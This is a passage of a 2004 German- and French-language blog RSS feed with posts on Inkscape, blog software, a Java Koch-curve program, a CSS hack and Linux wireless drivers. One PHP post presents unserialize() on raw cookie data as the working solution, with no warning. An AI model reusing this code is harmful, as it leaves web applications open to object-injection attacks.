  11794.    <dc:creator>Andreas Jaggi</dc:creator>
  11795.    <creativeCommons:license></creativeCommons:license>
  11796.    <pubDate>Sun, 11 Apr 2004 15:51:14 +0200</pubDate>
  11797.    <category domain="">Coding</category>
  11798.    <description><![CDATA[<p>Nun findet man hier auch diverse <abbr title="Rich Site Summary | RDF Site Summary | Really Simple Syndication">RSS</abbr>-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen.</p>                                                                                                                                                        <ul><li><a href="" title="Was ist RSS? (">Was ist RSS?</a></li><li><a href="" title="TrackBack Development (">TrackBack Development</a></li></ul>
  11799. <p>Feeds</p>
  11800. <ul><li>Alle Sprachen<ul>
  11801. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11802. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11803. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11804. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11805. </ul></li><li>Deutsch<ul>
  11806. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11807. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11808. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11809. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11810. </ul></li><li>Französisch<ul>
  11811. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11812. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11813. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11814. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11815. </ul></li></ul>
  11816. ]]></description>
  11817.    <content:encoded><![CDATA[<p>Nun findet man hier auch diverse <abbr title="Rich Site Summary | RDF Site Summary | Really Simple Syndication">RSS</abbr>-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen.</p>                                                                                                                                                        <ul><li><a href="" title="Was ist RSS? (">Was ist RSS?</a></li><li><a href="" title="TrackBack Development (">TrackBack Development</a></li></ul>
  11818. <p>Feeds</p>
  11819. <ul><li>Alle Sprachen<ul>
  11820. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11821. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11822. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11823. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11824. </ul></li><li>Deutsch<ul>
  11825. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11826. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11827. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11828. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11829. </ul></li><li>Französisch<ul>
  11830. <li><a href="" title="Atom Feed">Atom 0.3</a></li>
  11831. <li><a href="" title="RSS2 Feed">RSS 2.0</a></li>
  11832. <li><a href="" title="RSS 0.92 Feed">RSS 0.92</a></li>
  11833. <li><a href="" title="RSS 1.0 Feed">RSS 1.0</a></li>
  11834. </ul></li></ul>
  11835. ]]></content:encoded>
  11836.  </item>
  11838.  <item>
  11839.    <title>Inkscape</title>
  11840.    <link></link>
  11841.    <guid isPermaLink="true"></guid>
  11842.    <dc:creator>Andreas Jaggi</dc:creator>
  11843.    <creativeCommons:license></creativeCommons:license>
  11844.    <pubDate>Fri, 09 Apr 2004 21:22:13 +0200</pubDate>
  11845.    <category domain="">Webdesign</category>
  11846.    <description><![CDATA[<p>Gestern habe ich <a href="" title="Inkscape">Inkscape</a> entdeckt. Inkscape ist ein Vektor-Graphikprogramm, das <a href="" title="SVG beim W3C"><abbr title="Scalable Vector Graphics">SVG</abbr></a> als Dateiformat benutzt.</p><p>Das Programm lässt sich mit <a href="" title="Macromedia Fireworks">Macromedia Fireworks</a> vergleichen, wennauch der Funktionsumfang noch nicht ganz so gross ist. So kann Inkscape nur nach <abbr title="Portable Network Graphics">PNG</abbr> exportieren und unterstützt keine Animationen. Dafür ist IMHO die Vektorbearbeitung von Inkscape schon jetzt der von Fireworks überlegen.</p><p>Nachdem ich auch das Tutorial gemacht habe, durfte ich feststellen, dass das Userinterface von Inkscape grösstenteils absolut top ist. So eine angenehme und einfache Handhabung habe ich bei einem Graphikprogramm bisher vergebens gesucht. Da kann selbst mein bisheriger Favorit Fireworks fast nicht mithalten.</p><ul><li><a href="" title="Screenshots von Inkscape">Screenshots</a></li><li><a href="" title="Default Tutorial (SVG)">Default Tutorial</a></li><li><a href="" title="Inkscape Tutorials (">Inkscape Tutorials</a></li></ul>
  11847. ]]></description>
  11848.    <content:encoded><![CDATA[<p>Gestern habe ich <a href="" title="Inkscape">Inkscape</a> entdeckt. Inkscape ist ein Vektor-Graphikprogramm, das <a href="" title="SVG beim W3C"><abbr title="Scalable Vector Graphics">SVG</abbr></a> als Dateiformat benutzt.</p><p>Das Programm lässt sich mit <a href="" title="Macromedia Fireworks">Macromedia Fireworks</a> vergleichen, wennauch der Funktionsumfang noch nicht ganz so gross ist. So kann Inkscape nur nach <abbr title="Portable Network Graphics">PNG</abbr> exportieren und unterstützt keine Animationen. Dafür ist IMHO die Vektorbearbeitung von Inkscape schon jetzt der von Fireworks überlegen.</p><p>Nachdem ich auch das Tutorial gemacht habe, durfte ich feststellen, dass das Userinterface von Inkscape grösstenteils absolut top ist. So eine angenehme und einfache Handhabung habe ich bei einem Graphikprogramm bisher vergebens gesucht. Da kann selbst mein bisheriger Favorit Fireworks fast nicht mithalten.</p><ul><li><a href="" title="Screenshots von Inkscape">Screenshots</a></li><li><a href="" title="Default Tutorial (SVG)">Default Tutorial</a></li><li><a href="" title="Inkscape Tutorials (">Inkscape Tutorials</a></li></ul>
  11849. ]]></content:encoded>
  11850.  </item>
  11852.  <item>
  11853.    <title>x-log v2.02c</title>
  11854.    <link></link>
  11855.    <guid isPermaLink="true"></guid>
  11856.    <dc:creator>Andreas Jaggi</dc:creator>
  11857.    <creativeCommons:license></creativeCommons:license>
  11858.    <pubDate>Thu, 08 Apr 2004 22:07:57 +0200</pubDate>
  11859.    <category domain="">Coding</category>
  11860.    <description><![CDATA[<p>So, nun sind auch die Erweiterungen, welche ich während der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.</p><p>Erwähnenswerte neue Features:</p><ul><li>Labels, einzelne Einträge sind nun nicht mehr nur via <a href="" title="x-log v2.02c">detail.php?id=324018</a> erreichbar sondern auch via <a href="" title="x-log v2.02c">detail.php?label=x-log_v202c</a></li> <li>Archiv, wie schon gehabt</li><li>mod_rewrite für einzele Einträge, dieser Eintrag ist auch erreichbar via <a href="" title="x-log v2.02c"></a> und <a href="" title="x-log v2.02c"></a></li><li>mod_rewrite fürs Archiv, <a href="" title="2004">archiv.php?jahr=2004</a> ist auch erreichbar via <a href="" title="2004"></a> und infolge der Verschachtelung von Catch-All-Expressions auch via <a href="" title="2004"></a></li><li><abbr title="Extensible Hypertext Markup Language">XHTML</abbr> 1.0 Strict mit korrektem <abbr title="Multipurpose Internet Mail Extensions">MIME</abbr>-Type (application/xhtml+xml, falls vom Browser unterstützt) für alle Einträge seit Jahresbeginn (mal schauen wie lange das so bleibt ;-)</li></ul>
  11861. ]]></description>
  11862.    <content:encoded><![CDATA[<p>So, nun sind auch die Erweiterungen, welche ich während der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.</p><p>Erwähnenswerte neue Features:</p><ul><li>Labels, einzelne Einträge sind nun nicht mehr nur via <a href="" title="x-log v2.02c">detail.php?id=324018</a> erreichbar sondern auch via <a href="" title="x-log v2.02c">detail.php?label=x-log_v202c</a></li> <li>Archiv, wie schon gehabt</li><li>mod_rewrite für einzele Einträge, dieser Eintrag ist auch erreichbar via <a href="" title="x-log v2.02c"></a> und <a href="" title="x-log v2.02c"></a></li><li>mod_rewrite fürs Archiv, <a href="" title="2004">archiv.php?jahr=2004</a> ist auch erreichbar via <a href="" title="2004"></a> und infolge der Verschachtelung von Catch-All-Expressions auch via <a href="" title="2004"></a></li><li><abbr title="Extensible Hypertext Markup Language">XHTML</abbr> 1.0 Strict mit korrektem <abbr title="Multipurpose Internet Mail Extensions">MIME</abbr>-Type (application/xhtml+xml, falls vom Browser unterstützt) für alle Einträge seit Jahresbeginn (mal schauen wie lange das so bleibt ;-)</li></ul>
  11863. ]]></content:encoded>
  11864.  </item>
  11866.  <item>
  11867.    <title>Joyeux Anniversaire Satellite</title>
  11868.    <link></link>
  11869.    <guid isPermaLink="true"></guid>
  11870.    <dc:creator>Andreas Jaggi</dc:creator>
  11871.    <creativeCommons:license></creativeCommons:license>
  11872.    <pubDate>Thu, 08 Apr 2004 15:44:19 +0200</pubDate>
  11873.    <category domain="">Music</category>
  11874.    <description><![CDATA[<p>La semaine dernière j'ai passé presque tous les jours, soirs et nuits au <a href="" title="Satellite">Satellite</a> . Il y avait la fête de <a href="" title="Satellite - 20 ans">20 ans de Satellite</a>. Et puis le weekend il y avait des concerts vachement génials.</p>
  11875. ]]></description>
  11876.    <content:encoded><![CDATA[<p>La semaine dernière j'ai passé presque tous les jours, soirs et nuits au <a href="" title="Satellite">Satellite</a> . Il y avait la fête de <a href="" title="Satellite - 20 ans">20 ans de Satellite</a>. Et puis le weekend il y avait des concerts vachement génials.</p>
  11877. ]]></content:encoded>
  11878.  </item>
  11880.  <item>
  11881.    <title>Neue alte Features</title>
  11882.    <link></link>
  11883.    <guid isPermaLink="true"></guid>
  11884.    <dc:creator>Andreas Jaggi</dc:creator>
  11885.    <creativeCommons:license></creativeCommons:license>
  11886.    <pubDate>Sun, 28 Mar 2004 01:18:46 +0100</pubDate>
  11887.    <category domain="">Coding</category>
  11888.    <description><![CDATA[<p>Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)</p><p>Dabei hat mir <abbr title="PHP Hypertext Preprocessor">PHP</abbr> den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.</p><pre>function saveData ( $data ) {
  11889.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  11890. }
  11892. function loadData () {
  11893.        return unserialize($_COOKIE['cookiename']);
  11894. }</pre><p>Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.</p><pre>function saveData ( $data ) {
  11895.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  11896. }
  11898. function loadData () {
  11899.        return unserialize(stripslashes($_COOKIE['cookiename']));
  11900. }</pre>
  11901. ]]></description>
  11902.    <content:encoded><![CDATA[<p>Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)</p><p>Dabei hat mir <abbr title="PHP Hypertext Preprocessor">PHP</abbr> den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.</p><pre>function saveData ( $data ) {
  11903.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  11904. }
  11906. function loadData () {
  11907.        return unserialize($_COOKIE['cookiename']);
  11908. }</pre><p>Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.</p><pre>function saveData ( $data ) {
  11909.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  11910. }
  11912. function loadData () {
  11913.        return unserialize(stripslashes($_COOKIE['cookiename']));
  11914. }</pre>
  11915. ]]></content:encoded>
  11916.  </item>
  11918.  <item>
  11919.    <title>Paris en nuit</title>
  11920.    <link></link>
  11921.    <guid isPermaLink="true"></guid>
  11922.    <dc:creator>Andreas Jaggi</dc:creator>
  11923.    <creativeCommons:license></creativeCommons:license>
  11924.    <pubDate>Sat, 27 Mar 2004 21:45:26 +0100</pubDate>
  11925.    <category domain="">Misc</category>
  11926.    <description><![CDATA[Chez <a href="" title=""></a> j'ai trouvé cette <a href="" title="parisbynight.jpg (1.8 MO)">image exceptionelle</a> de Paris.
  11927. ]]></description>
  11928.    <content:encoded><![CDATA[Chez <a href="" title=""></a> j'ai trouvé cette <a href="" title="parisbynight.jpg (1.8 MO)">image exceptionelle</a> de Paris.
  11929. ]]></content:encoded>
  11930.  </item>
  11932.  <item>
  11933.    <title>Kochsche Kurve</title>
  11934.    <link></link>
  11935.    <guid isPermaLink="true"></guid>
  11936.    <dc:creator>Andreas Jaggi</dc:creator>
  11937.    <creativeCommons:license></creativeCommons:license>
  11938.    <pubDate>Fri, 26 Mar 2004 23:18:02 +0100</pubDate>
  11939.    <category domain="">Coding</category>
  11940.    <description><![CDATA[<p>Heute haben wir im <abbr title="A general purpose, high-level, object-oriented, cross-platform programming language developed by Sun Microsystems">Java</abbr>-Programmieren mit <abbr title="Graphical User Interface">GUI</abbr>-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die <a href="" title="Beschreibung auf französisch (">Kochsche Kurve</a>.</p><p><img src="" width="422" height="472" alt="Kochsche Kurve"></p>
  11941. <br><br>
  11942. <pre>import java.awt.*;
  11943. import java.awt.event.*;
  11944. import javax.swing.*;
  11946. /**
  11947. *  Kochsche Kurve
  11948. *
  11949. * @author     Andreas Jaggi
  11950. * @created    26. März 2004
  11951. * @version    1.0
  11952. */
  11954. public class KochscheKurve
  11955.                 extends JFrame {
  11956.        /**
  11957.         *  Constructor for the KochscheKurve object
  11958.         */
  11959.        public KochscheKurve() {
  11960.                setSize( 600, 600 );
  11961.                setTitle( "Die Kochsche Kurve" );
  11962.        }
  11965.        /**
  11966.         *  Überladene "interne" Methode, die aufgerufen wird, wenn das Fenster neu
  11967.         *  gezeichnet werden muss
  11968.         *
  11969.         * @param  g  Graphik-Objekt, auf dem gezeichnet wird
  11970.         */
  11971.        public void paint( Graphics g ) {
  11972.                super.paint( g );
  11974.                double  x1;
  11975.                double  x2;
  11976.                double  x3;
  11977.                double  y1;
  11978.                double  y2;
  11979.                double  y3;
  11980.                int     depth  = 13;
  11982.                x1 = 100;
  11983.                y1 = 400;
  11984.                x2 = 500;
  11985.                y2 = 400;
  11986.                x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) -
  11987.                                ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1;
  11988.                y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) +
  11989.                                ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1;
  11991.                koch( g, depth, x2, y2, x1, y1 );
  11992.                koch( g, depth, x1, y1, x3, y3 );
  11993.                koch( g, depth, x3, y3, x2, y2 );
  11994.        }
  11997.        /**
  11998.         *  Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer
  11999.         *  bestimmten Tiefe zeichnet.
  12000.         *
  12001.         * @param  g      Graphik-Objekt, auf dem gezeichnet wird
  12002.         * @param  depth  Rekursionstiefe
  12003.         * @param  x1     X-Koordinate des ersten Punktes
  12004.         * @param  y1     Y-Koordinate des ersten Punktes
  12005.         * @param  x2     X-Koordinate des zweiten Punktes
  12006.         * @param  y2     X-Koordinate des zweiten Punktes
  12007.         */
  12008.        public void koch( Graphics g, int depth, double x1, double y1, double x2,
  12009.                        double y2 ) {
  12010.                double  x13  = x1 + ( x2 - x1 ) / 3.0;
  12011.                double  x23  = x1 + 2.0 * ( x2 - x1 ) / 3.0;
  12013.                double  y13  = y1 + ( y2 - y1 ) / 3.0;
  12014.                double  y23  = y1 + 2.0 * ( y2 - y1 ) / 3.0;
  12016.                double  xd   = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) -
  12017.                                ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13;
  12018.                double  yd   = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) +
  12019.                                ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13;
  12021.                if ( depth > 0 ) {
  12022.                        koch( g, depth - 1, x1, y1, x13, y13 );
  12023.                        koch( g, depth - 1, x13, y13, xd, yd );
  12024.                        koch( g, depth - 1, xd, yd, x23, y23 );
  12025.                        koch( g, depth - 1, x23, y23, x2, y2 );
  12026.                } else {
  12027.                        g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 );
  12028.                }
  12029.        }
  12032.        /**
  12033.         *  The main program for the KochscheKurve class
  12034.         *
  12035.         * @param  args  The command line arguments
  12036.         */
  12037.        public static void main( String[] args ) {
  12038.                KochscheKurve  graf  = new KochscheKurve();
  12040.                graf.setVisible( true );
  12042.                graf.addWindowListener(
  12043.                        new WindowAdapter() {
  12044.                                public void windowClosing( WindowEvent e ) {
  12045.                                        System.exit( 0 );
  12046.                                }
  12047.                        }
  12048.                                 );
  12050.        }
  12052. }
  12053. </pre>
  12054. ]]></description>
  12055.    <content:encoded><![CDATA[<p>Heute haben wir im <abbr title="A general purpose, high-level, object-oriented, cross-platform programming language developed by Sun Microsystems">Java</abbr>-Programmieren mit <abbr title="Graphical User Interface">GUI</abbr>-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die <a href="" title="Beschreibung auf französisch (">Kochsche Kurve</a>.</p><p><img src="" width="422" height="472" alt="Kochsche Kurve"></p>
  12056. <br><br>
  12057. <pre>import java.awt.*;
  12058. import java.awt.event.*;
  12059. import javax.swing.*;
  12061. /**
  12062. *  Kochsche Kurve
  12063. *
  12064. * @author     Andreas Jaggi
  12065. * @created    26. März 2004
  12066. * @version    1.0
  12067. */
  12069. public class KochscheKurve
  12070.                 extends JFrame {
  12071.        /**
  12072.         *  Constructor for the KochscheKurve object
  12073.         */
  12074.        public KochscheKurve() {
  12075.                setSize( 600, 600 );
  12076.                setTitle( "Die Kochsche Kurve" );
  12077.        }
  12080.        /**
  12081.         *  Überladene "interne" Methode, die aufgerufen wird, wenn das Fenster neu
  12082.         *  gezeichnet werden muss
  12083.         *
  12084.         * @param  g  Graphik-Objekt, auf dem gezeichnet wird
  12085.         */
  12086.        public void paint( Graphics g ) {
  12087.                super.paint( g );
  12089.                double  x1;
  12090.                double  x2;
  12091.                double  x3;
  12092.                double  y1;
  12093.                double  y2;
  12094.                double  y3;
  12095.                int     depth  = 13;
  12097.                x1 = 100;
  12098.                y1 = 400;
  12099.                x2 = 500;
  12100.                y2 = 400;
  12101.                x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) -
  12102.                                ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1;
  12103.                y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) +
  12104.                                ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1;
  12106.                koch( g, depth, x2, y2, x1, y1 );
  12107.                koch( g, depth, x1, y1, x3, y3 );
  12108.                koch( g, depth, x3, y3, x2, y2 );
  12109.        }
  12112.        /**
  12113.         *  Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer
  12114.         *  bestimmten Tiefe zeichnet.
  12115.         *
  12116.         * @param  g      Graphik-Objekt, auf dem gezeichnet wird
  12117.         * @param  depth  Rekursionstiefe
  12118.         * @param  x1     X-Koordinate des ersten Punktes
  12119.         * @param  y1     Y-Koordinate des ersten Punktes
  12120.         * @param  x2     X-Koordinate des zweiten Punktes
  12121.         * @param  y2     X-Koordinate des zweiten Punktes
  12122.         */
  12123.        public void koch( Graphics g, int depth, double x1, double y1, double x2,
  12124.                        double y2 ) {
  12125.                double  x13  = x1 + ( x2 - x1 ) / 3.0;
  12126.                double  x23  = x1 + 2.0 * ( x2 - x1 ) / 3.0;
  12128.                double  y13  = y1 + ( y2 - y1 ) / 3.0;
  12129.                double  y23  = y1 + 2.0 * ( y2 - y1 ) / 3.0;
  12131.                double  xd   = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) -
  12132.                                ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13;
  12133.                double  yd   = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) +
  12134.                                ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13;
  12136.                if ( depth > 0 ) {
  12137.                        koch( g, depth - 1, x1, y1, x13, y13 );
  12138.                        koch( g, depth - 1, x13, y13, xd, yd );
  12139.                        koch( g, depth - 1, xd, yd, x23, y23 );
  12140.                        koch( g, depth - 1, x23, y23, x2, y2 );
  12141.                } else {
  12142.                        g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 );
  12143.                }
  12144.        }
  12147.        /**
  12148.         *  The main program for the KochscheKurve class
  12149.         *
  12150.         * @param  args  The command line arguments
  12151.         */
  12152.        public static void main( String[] args ) {
  12153.                KochscheKurve  graf  = new KochscheKurve();
  12155.                graf.setVisible( true );
  12157.                graf.addWindowListener(
  12158.                        new WindowAdapter() {
  12159.                                public void windowClosing( WindowEvent e ) {
  12160.                                        System.exit( 0 );
  12161.                                }
  12162.                        }
  12163.                                 );
  12165.        }
  12167. }
  12168. </pre>
  12169. ]]></content:encoded>
  12170.  </item>
  12172.  <item>
  12173.    <title>Rechnen mit CSS</title>
  12174.    <link></link>
  12175.    <guid isPermaLink="true"></guid>
  12176.    <dc:creator>Andreas Jaggi</dc:creator>
  12177.    <creativeCommons:license></creativeCommons:license>
  12178.    <pubDate>Sun, 14 Mar 2004 12:43:22 +0100</pubDate>
  12179.    <category domain="">Webdesign</category>
  12180.    <description><![CDATA[<p>Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:</p><pre>#rechts li a {
  12181. display: block;
  12182. border-bottom: 1px solid #FFFFFF;
  12183. width: 100% - 30px;
  12184. padding-left: 30px;
  12185. }</pre><p>Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.<br>Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.<br>Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. Natürlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)</p><p>Da ich nun keine Windows-Maschine mehr habe, wäre ich froh um Screenshots vom Submenu, wenn mit der Maus über ein Link gefahren wird (a:hover).</p>
  12186. ]]></description>
  12187.    <content:encoded><![CDATA[<p>Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:</p><pre>#rechts li a {
  12188. display: block;
  12189. border-bottom: 1px solid #FFFFFF;
  12190. width: 100% - 30px;
  12191. padding-left: 30px;
  12192. }</pre><p>Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.<br>Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.<br>Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. Natürlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)</p><p>Da ich nun keine Windows-Maschine mehr habe, wäre ich froh um Screenshots vom Submenu, wenn mit der Maus über ein Link gefahren wird (a:hover).</p>
  12193. ]]></content:encoded>
  12194.  </item>
  12196.  <item>
  12197.    <title>125. Geburtstag von Albert Einstein</title>
  12198.    <link></link>
  12199.    <guid isPermaLink="true"></guid>
  12200.    <dc:creator>Andreas Jaggi</dc:creator>
  12201.    <creativeCommons:license></creativeCommons:license>
  12202.    <pubDate>Sun, 14 Mar 2004 12:16:49 +0100</pubDate>
  12203.    <category domain="">Misc</category>
  12204.    <description><![CDATA[<blockquote><p>&quot;Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaßt die ganze Welt.&quot;</p><p>Albert Einstein (1879-1955)</p></blockquote>
  12205. <p>Mehr dazu bei <a href="" title="Relativität, Schnüffler und Würfel -- zum 125. Geburtstag von Albert Einstein">heise</a></p>
  12206. ]]></description>
  12207.    <content:encoded><![CDATA[<blockquote><p>&quot;Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaßt die ganze Welt.&quot;</p><p>Albert Einstein (1879-1955)</p></blockquote>
  12208. <p>Mehr dazu bei <a href="" title="Relativität, Schnüffler und Würfel -- zum 125. Geburtstag von Albert Einstein">heise</a></p>
  12209. ]]></content:encoded>
  12210.  </item>
  12212.  <item>
  12213.    <title>x-log, trashed again</title>
  12214.    <link></link>
  12215.    <guid isPermaLink="true"></guid>
  12216.    <dc:creator>Andreas Jaggi</dc:creator>
  12217.    <creativeCommons:license></creativeCommons:license>
  12218.    <pubDate>Sun, 14 Mar 2004 00:00:00 +0100</pubDate>
  12219.    <category domain="">Misc</category>
  12220.    <description><![CDATA[<blockquote><p>&quot;Am liebsten erinnere ich mich an die Zukunft.&quot;</p><p>Salvador Dalí (1904-1989), span. surrealist. Maler</p></blockquote>
  12221. <p>Wie schon angekündigt, habe ich während den Semesterferien die <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefügt.<br>Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefällt mir schon jetzt nicht mehr.</p>
  12222. ]]></description>
  12223.    <content:encoded><![CDATA[<blockquote><p>&quot;Am liebsten erinnere ich mich an die Zukunft.&quot;</p><p>Salvador Dalí (1904-1989), span. surrealist. Maler</p></blockquote>
  12224. <p>Wie schon angekündigt, habe ich während den Semesterferien die <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefügt.<br>Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefällt mir schon jetzt nicht mehr.</p>
  12225. ]]></content:encoded>
  12226.  </item>
  12228.  <item>
  12229.    <title>PHP Literatur</title>
  12230.    <link></link>
  12231.    <guid isPermaLink="true"></guid>
  12232.    <dc:creator>Andreas Jaggi</dc:creator>
  12233.    <creativeCommons:license></creativeCommons:license>
  12234.    <pubDate>Sun, 29 Feb 2004 20:47:00 +0100</pubDate>
  12235.    <category domain="">Coding</category>
  12236.    <description><![CDATA[Schon nur weil ich am heutigen Datum erst wieder in 4 Jahren was schreiben kann, muss dieser Eintrag hier sein ;-)<br>Aber auch weil ich durch die Lektüre folgender Artikel zu einem Rewrite (ja, from Scratch) von meinem Weblog motiviert worden bin. Insbesondere hat mich der Artikel über Template Engines beeindruck, da hier mit einer völlig anderen Ansicht an das Problem herangegangen wird, als ich es bisher getan habe. An dieser Stelle wäre es natürlich interessant zu wissen wie andere Leute ihre Templates handhaben.<br><br><a href="" title="how to write better code ("><b>how to write better code</b></a><br><a href="" title="A Few Tips for Writing Useful Libraries in PHP ("><b>A Few Tips for Writing Useful Libraries in PHP</b></a><br><a href="" title="Template Engines"><b>Template Engines</b></a><br><a href="" title="Functional Spec Tutorial - What and Why ("><b>Functional Specification Tutorial</b></a>
  12237. ]]></description>
  12238.    <content:encoded><![CDATA[Schon nur weil ich am heutigen Datum erst wieder in 4 Jahren was schreiben kann, muss dieser Eintrag hier sein ;-)<br>Aber auch weil ich durch die Lektüre folgender Artikel zu einem Rewrite (ja, from Scratch) von meinem Weblog motiviert worden bin. Insbesondere hat mich der Artikel über Template Engines beeindruck, da hier mit einer völlig anderen Ansicht an das Problem herangegangen wird, als ich es bisher getan habe. An dieser Stelle wäre es natürlich interessant zu wissen wie andere Leute ihre Templates handhaben.<br><br><a href="" title="how to write better code ("><b>how to write better code</b></a><br><a href="" title="A Few Tips for Writing Useful Libraries in PHP ("><b>A Few Tips for Writing Useful Libraries in PHP</b></a><br><a href="" title="Template Engines"><b>Template Engines</b></a><br><a href="" title="Functional Spec Tutorial - What and Why ("><b>Functional Specification Tutorial</b></a>
  12239. ]]></content:encoded>
  12240.  </item>
  12242.  <item>
  12243.    <title>Pinguinfunk</title>
  12244.    <link></link>
  12245.    <guid isPermaLink="true"></guid>
  12246.    <dc:creator>Andreas Jaggi</dc:creator>
  12247.    <creativeCommons:license></creativeCommons:license>
  12248.    <pubDate>Mon, 23 Feb 2004 16:08:00 +0100</pubDate>
  12249.    <category domain="">Linux</category>
  12250.    <description><![CDATA[Da es für die im PowerBook eingebaute Airport Extreme WLAN-Karte (Broadcom) keine Linuxtreiber gibt, habe ich vor ein paar Wochen eine <a href="" title="MA401 | Product | Support | NETGEAR"><b>Netgear MA401RA</b></a> günstig erworben (ist ein Auslaufmodell). Für diese hat es im Kernel selbst Treiber.<br><br>Um <a href="" title="PCMCIA mit Linux"><b>PCMCIA</b></a> aufm PowerBook zum Laufen zu bringen benötigte es eine spezielle <a href="" title="config.opts herunterladen"><b>config.opts</b></a>. Nun funktioniert die drahtlose Verbindung problemlos. Jedoch unterstützen die Treiber des Kernels den <a href="" title="Link zur Orinoco-Monitor-Seite ("><b>Monitor-Modus</b></a> nicht, welcher für Spielereien wie <a href="" title="802.11 layer2 wireless network detector, sniffer, and intrusion detection system"><b>Kismet</b></a>, <a href="" title="wireless network discovery and auditing tool"><b>wellenreiter</b></a> etc. benötigt wird. Um diesen Modus nützen zu können müssen zuerst die Treiber <a href="" title="den Patch herunterladen"><b>gepatcht</b></a> werden (der Patch funktioniert partiel auch für 2.6.1 und 2.6.3 Kernel).<br>Dazu einfach den Patch ins 